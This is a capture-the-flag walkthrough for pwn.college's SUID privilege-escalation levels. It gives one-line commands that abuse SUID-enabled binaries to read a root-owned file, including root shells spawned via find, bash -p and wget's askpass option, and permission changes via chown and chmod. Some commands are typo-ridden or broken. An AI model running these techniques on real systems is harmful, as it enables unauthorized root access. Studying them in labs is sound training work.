How to Read Sensitive Files with SUID set on the Commands and How to Escalate Privilege
Introduction to Pwn College
pwn.college is an online platform that offers training modules for cybersecurity professionals. It helps students and others learn about and practice core cybersecurity concepts.
Pwn.college is an education platform for students (and other interested parties) to learn about, and practice, core cybersecurity concepts in a hands-on fashion. In martial arts terms, it is designed to take a “white belt” in cybersecurity to becoming a “blue belt”, able to approach (simple) CTFs and wargames. Our philosophy is “practice makes perfect”.
The platform is maintained by an awesome team of hackers at Arizona State University. It powers much of ASU’s cybersecurity curriculum, and is open, for free, to participation for interested people around the world!
Program Misuse: Privilege Escalation
Level 1 — If SUID bit on /usr/bin/cat
The ‘cat’ command is commonly used to display the contents of a file. In this scenario, the SUID bit is set for ‘cat,’ enabling us to read the /flag file, which the root user owns
cat /flag
Level 2: If SUID bit on /usr/bin/more
The ‘more’ command is used to view the contents of a file page by page. In this case, we attempt to read the /flag file, leveraging the SUID bit set on ‘more’ and accessing a file owned by root
more /flag
Level 3: If SUID bit on /usr/bin/less
Similar to ‘more,’ ‘less’ is a command-line pager for viewing files interactively. Here, we aim to read the /flag file using ‘less’ with the SUID bit set, dealing with a file owned by root.
less /flag
Level 4: If SUID bit on /usr/bin/head
The ‘head’ command is employed to display the initial lines of a file. In this context, we try to read the /flag file with the SUID bit set on ‘head,’ accessing a file owned by root
head /flag
Level 5: If SUID bit on /usr/bin/tail
Used to display the last few lines of a file, the ‘tail’ command is applied here to read the contents of the /flag file. The SUID bit is set for ‘tail,’ facilitating access to a file owned by root
tail /flag
Level 6: If SUID bit on /usr/bin/sort
Sorting the lines of a file is a common task with the ‘sort’ command. Attempting to read the /flag file, we utilize the SUID bit set for ‘sort’ while dealing with a file owned by root.
sort /flag
Level 7: If SUID bit on /usr/bin/vim
The ‘vim’ text editor is invoked to open and edit files. In this case, we open the /flag file using ‘vim’ with the SUID bit set, aiming to access a file owned by root.
vim /flag
Level 8: If SUID bit on /usr/bin/emacs
As a powerful text editor, ‘emacs’ is used here to open and modify files. We try to read the /flag file using ‘emacs’ with the SUID bit set, addressing a file owned by root
emacs /flag
p
Level 9: If SUID bit on /usr/bin/nano
Offering a user-friendly text editor, ‘nano’ is utilized to open and edit files. In this instance, we attempt to read the /flag file using ‘nano’ with the SUID bit set, interacting with a file owned by root.
nano /flag
Level 10: If SUID bit on /usr/bin/rev
Reversing the content of a file is achieved with the ‘rev’ command. Here, we attempt to reverse the /flag file’s content 2 times using ‘rev’ with the SUID bit set, interacting with a file owned by root.
rev /flag | rev
Level 11: If SUID bit on /usr/bin/od
The ‘od’ command displays the octal dump of a file. Trying to read the /flag file, we use ‘od’ with the SUID bit set, interacting with a file owned by the root.
od /flag
Level 12: If SUID bit on /usr/bin/hd
For a hexadecimal dump of a file, the ‘hd’ command is employed. In this scenario, we aim to read the /flag file using ‘hd’ with the SUID bit set, dealing with a file owned by root
hd /flag
Level 13: If SUID bit on /usr/bin/xxd
Generating a hexadecimal dump with line annotations, ‘xxd’ is used here to read the /flag file. The SUID bit is set for ‘xxd,’ allowing access to a file owned by root.
xxd /flag
Level 14: If SUID bit on /usr/bin/base32
Base32 encoding and decoding is performed with the ‘base32’ command. Here, we Encode and decode the /flag file to read the contents.
base32 /flag | base32 -d
Level 15: If SUID bit on /usr/bin/base64
Base64 encoding and decoding is performed with the ‘base64’ command. Here, we Encode and decode the /flag file to read the contents.
base64 /flag | base64 -d
Level 16: If SUID bit on /usr/bin/split
The ‘split’ command is used to split the Files. We are splitting the output of files into another file and viewing it through ‘cat’ command
split /flag
ls
cat FILENAME_THAT_IS_GENERATED
Level 17: If SUID bit on /usr/bin/gzip
‘gzip’ is a tool to compress and decompress files. Here, we compress the flag and decompress the same to view the contents.
gzip -c /flag | gzip -d
Level 18: If SUID bit on /usr/bin/bzip2
‘gzip’ is a tool to compress and decompress files. Here, we compress the flag and decompress the same to view the contents.
bzip2 -c /flag | bzip2 -d
Level 19: If SUID bit on /usr/bin/zip
Creating a zip archive of a file is achieved with the ‘zip’ command. Attempting to create a zip archive of the /flag file, we use ‘zip’ with the SUID bit set, accessing a file owned by root.
zip flag.zip /flag && cat flag.zip
Level 20: If SUID bit on /usr/bin/tar
The ‘tar’ command is used to create and manipulate tar archives. Here, we attempt to create a tar archive of the /flag file using ‘tar’ with the SUID bit set, dealing with a file owned by root.
tar -cf flag.tar /flag && cat flag.tar
Level 21: If SUID bit on /usr/bin/ar
Creating and managing ar archives is done with this command. We try to create an ar archive of the /flag file, utilizing the SUID bit set for ‘ar’ and accessing a file owned by root.
F=$(mktemp -u) && ar r “$F” /flag && cat “$F”
Level 22: If SUID bit on /usr/bin/cpio
The ‘find’ command locates files, and ‘cpio’ is used for archive creation. We attempt to create a cpio archive of the /flag file using ‘find’ and ‘cpio’ with the SUID bit set, dealing with a file owned by root.
find /flag | cpio -o > flag.cpioio && cat flag.cpio
Level 23: If SUID bit on /usr/bin/genisoimage
For creating ISO images, the ‘genisoimage’ command is used. In this case, we attempt to create an ISO image with the /flag file using ‘genisoimage’ with the SUID bit set, interacting with a file owned by root
genisoimage -sort /flag
Level 24: If SUID bit on /usr/bin/env
“The ‘env’ command sets the environment for a command. Here, we use ‘env’ to execute ‘cat’ and display the contents of the /flag file with the SUID bit set, accessing a file owned by root
env cat /flag
Level 25: If SUID bit on /usr/bin/find
The ‘find’ command is employed with the ‘exec’ option to execute commands on found files. We attempt to execute a shell with root privileges and display the /flag file after gaining root access.”
find . -exec /bin/sh -p \;
cat /flag
Level 26: If SUID bit on /usr/bin/make
The ‘make’ command builds and maintains programs. In this case, we use ‘make’ to execute ‘cat’ and display the contents of the /flag file with the SUID bit set, dealing with a file owned by root
make -s — eval=$’x:\n\t-’”cat /flag”
Level 27: If SUID bit on /usr/bin/nice
The ‘nice’ command alters the scheduling priority of a command. Trying to execute ‘cat’ with an increased priority, we aim to display the /flag file with the SUID bit set, accessing a file owned by root.
nice cat /flag
Level 28: If SUID bit on /usr/bin/timeout
The ‘timeout’ command sets a time limit on the execution of a command. Here, we use ‘timeout’ to limit the execution of ‘cat’ and display the contents of the /flag file with the SUID bit set, dealing with a file owned by root
timeout 1 cat /flag
Level 29: If SUID bit on /usr/bin/stdbuf
The ‘stdbuf’ command adjusts buffering options for a command. In this instance, we use ‘stdbuf’ to run ‘cat’ with unbuffered input, attempting to display the contents of the /flag file with the SUID bit set, and accessing a file owned by root.
stdbuf -i0 cat /flag
Level 30: If SUID bit on /usr/bin/setarch
The ‘setarch’ command sets the architecture for a command. Trying to display the contents of the /flag file, we use ‘setarch’ to execute ‘cat’ with the SUID bit set, interacting with a file owned by root
setarch $(arch) cat /flag
Level 31: If SUID bit on /usr/bin/watch
The ‘watch’ command repeats a command at specified intervals. Here, we use ‘watch’ to repeatedly execute ‘cat’ and display the contents of the /flag file with the SUID bit set, dealing with a file owned by root.
watch -x cat /flag
Level 32: If SUID bit on /usr/bin/socat
Socat is a versatile relay tool. Attempting to transfer and display the contents of the /flag file, we use ‘socat’ with the SUID bit set, dealing with a file owned by root.
socat -u /flag -
Level 33: If SUID bit on /usr/bin/whiptail
Whiptail is a dialog box-driven interface. Here, we use ‘whiptail’ to display the contents of the /flag file in a dialog box with specified dimensions, dealing with a file owned by root
whiptail — textbox /flag 10 30
Level 34: If SUID bit on /usr/bin/awk
The ‘awk’ command is used for pattern scanning and processing. In this scenario, we try to use ‘awk’ to display the contents of the /flag file.
awk “//” /flag
Level 35: If SUID bit on /usr/bin/sed
The ‘sed’ command is a stream editor. Here, we attempt to use ‘sed’ to display the contents of the /flag file
sed ‘’ /flag
Level 36: If SUID bit on /usr/bin/ed
he ‘ed’ editor is employed for line-oriented text editing. Trying to use ‘ed’ to print the contents of the /flag file
ed /flag CN
#Then type p to print flag and q to quit
Level 37: If SUID bit on /usr/bin/chown
The ‘chown’ command changes file ownership. Here, we attempt to change the ownership of the /flag file to ‘hacker’ and display its contents
chown hacker /flag && cat /flag
Level 38: If SUID bit on /usr/bin/chmod
The ‘chmod’ command modifies file permissions. In this instance, we attempt to change the permissions of the /flag file to allow read and write access for all users, and then display its contents
chmod 666 /flag && cat /flag
Level 39: If SUID bit on /usr/bin/cp
Copying the /flag file to the current directory is done with the ‘cp’ command. We try to copy the /flag file without the permissions.
cp — no-preserve=all /flag . && cat flag
Level 40: If SUID bit on /usr/bin/mv
The ‘mv’ command is used to move (rename) files. Here we are moving the code of ‘cat’ to the ‘mv’ tool. Now, if we use the ‘mv’ command it will display the contents of the file like ‘cat’.
Then we are running the /challenge/babysuid_level40
to set SUID on mv and we can read the contents of the /flag file.
mv /usr/bin/cat /usr/bin/mv || ./challenge/babysuid_level40 || mv /flag | grep pwn.college{
Level 41: If SUID bit on /usr/bin/perl
The ‘perl’ command is used for text processing. Here, we attempt to use ‘perl’ to display the contents of the /flag file.
perl -pe ‘END { close ARGV }’ /flag
Level 42: If SUID bit on /usr/bin/python
We are trying to run /flag file with python, which throws an error that contains the flag string.
You can also try to write a program that reads the content of the /flag file.
python /flag
Level 43: If SUID bit on /usr/bin/ruby
Creating and running a Ruby script to display the contents of the /flag file is done here with ‘echo’ and ‘ruby’
echo “puts File.read(‘/flag’)” >> a.rb && ruby a.rb CN
Level 44: If SUID bit on /usr/bin/bash
Executing bash with privileged mode is attempted here. After that, we try to use ‘cat’ to display the contents of the /flag file
bash -p CN then cat /flag
Level 45: If SUID bit on /usr/bin/date
The ‘date’ command is typically used for displaying or setting the system date and time. Here, we attempt to use ‘date’ to display the contents of the /flag file. We have to input a datefile for this command but if we give wrong file it will throw an error with the contents of the file.
date -f /flag
Level 46: If SUID bit on /usr/bin/dmesg
The ‘dmesg’ command displays kernel messages. Here, we attempt to use ‘dmesg’ to display the contents of the /flag file
dmesg -F /flag
Level 47: If SUID bit on /usr/bin/wc
The ‘wc’ command is used for word counting. Here, we try to use ‘wc’ to count words in the /flag file specified in a null-terminated list
wc — files0-from=/flag
Level 48: If SUID bit on /usr/bin/gcc
The ‘gcc’ command is a compiler for programming languages. In this scenario, we attempt to preprocess the /flag file using ‘gcc’ with specific flags
gcc -x c -E /flag
Level 49: If SUID bit on /usr/bin/as
The ‘as’ command is an assembler for programming languages. Here, we try to use ‘as’ to assemble the /flag file to display its contents
as /flag
Level 50: If SUID bit on /usr/bin/wget
This command creates a temporary executable script file using mktemp, sets execute permissions, and writes a simple shell script into it. The script is designed to execute /bin/sh
with a specific set of options. Finally, it uses wget
to download a file, passing the created script as the askpass program, allowing for potential privilege escalation or unauthorized access.
Then we can read the /flag file using cat /flag
F=$(mktemp) && chmod +x $F && echo -e ‘#!/bin/sh -p\n/bin/sh -p 1>&0’ >$F && wget — use-askpass=$F 0
cat /flag
Level 51: If SUID bit on /usr/bin/ssh-agent
Thank you for Reading!!
Happy Hunting ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng